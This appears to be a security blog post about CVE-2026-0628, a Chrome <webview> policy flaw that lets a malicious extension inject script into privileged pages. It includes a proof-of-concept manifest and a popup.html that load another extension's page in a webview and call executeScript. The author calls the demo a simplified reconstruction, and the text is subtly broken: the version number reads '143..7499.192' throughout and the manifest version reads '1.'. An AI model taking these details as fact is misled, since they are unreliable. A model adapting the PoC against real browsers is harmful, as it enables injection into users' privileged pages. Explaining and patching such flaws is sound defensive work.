Chrome boasts solid security, but we get fresh CVEs every year. One of the most dangerous class of flaws is when extensions can bypass Chrome’s boundaries. CVE-2026-0628, a WebView tag policy enforcement issue, is a textbook case. In this post, I’ll explain how a malicious Chrome extension could inject scripts or HTML into privileged pages before the patch in version 143..7499.192, show you a simplified proof-of-concept exploit, and link you to helpful resources.
Vulnerability: Weak policy enforcement on the <webview> tag in Chrome’s extension framework.
- Impact: A malicious extension could inject arbitrary HTML or JavaScript into a privileged browser page (like the Chrome Web Store or internal extension pages).
- Severity: High (per Chromium’s severity scale)
Affected Versions: Chrome prior to 143..7499.192
If the user installs a malicious extension, the extension could use the <webview> tag to bypass expected security restrictions and get code running where it shouldn’t.
Understanding the WebView Tag
The <webview> tag lets Chrome Apps (and some extensions) embed web content in their own sandboxed frame with more control than an iframe. It’s supposed to be limited, but this bug let extensions inject scripts into privileged pages by exploiting a loophole in policy checks.
Malicious Extension: The attacker convinces you to install their extension.
2. Special HTML: The extension loads a local HTML file that contains a <webview> targeting a privileged page (like chrome-extension://another-extension/somepage.html or even chrome://settings).
3. Script Injection: Using the executeScript method or by injecting script directly into the webview, the extension runs code in a page it shouldn’t be able to touch.
Proof of Concept (PoC): Simple Exploit
Suppose our extension’s manifest includes the webview permission and targets another extension’s page. Here’s what an attacker might do:
1. Manifest (manifest.json)
{
"name": "Malicious WebView Extension",
"version": "1.",
"manifest_version": 3,
"permissions": ["webview"],
"background": {
"service_worker": "background.js"
},
"host_permissions": ["<all_urls>"],
"action": {
"default_popup": "popup.html"
}
}
2. Malicious HTML (popup.html)
<!DOCTYPE html>
<html>
<body>
<webview id="hackView"
src="chrome-extension://TARGET_EXTENSION_ID/popup.html"
style="width:400px; height:400px;">
</webview>
<script>
const wv = document.getElementById('hackView');
wv.addEventListener('dom-ready', () => {
// Try to inject script
wv.executeScript({code: 'alert("Gotcha!");'});
});
</script>
</body>
</html>
3. What Happens
- Chrome (prior to 143..7499.192) fails to block the load and the script runs in privileged context, potentially giving the attacker access to sensitive data from that extension.
Links & References
- Chromium Bug Tracker for CVE-2026-0628 (restricted, but sometimes updates appear after public disclosure)
- Chrome Release Notes - 143..7499.192
- WebView Extensions - Chrome Docs
- Understanding Chrome Extension Security
Mitigation and Patch
Fixed in Chrome 143..7499.192 and later.
Action: Users should always update Chrome. Extension developers should review use of <webview>, and never load privileged pages.
CVE-2026-0628 reminds us how small policy enforcement gaps can lead to browser takeover.
Exclusive Note:
Most technical details for new vulnerabilities remain private until patch rollout, but this simplified demonstration is based on the info from public sources and prior class of Chrome WebView bugs.
Stay safe. Patch fast. Don’t load random extensions. If you want to test, always use a disposable profile and never on your main system.
Timeline
Published on: 01/06/2026 23:57:00 UTC
Last modified on: 01/12/2026 16:48:33 UTC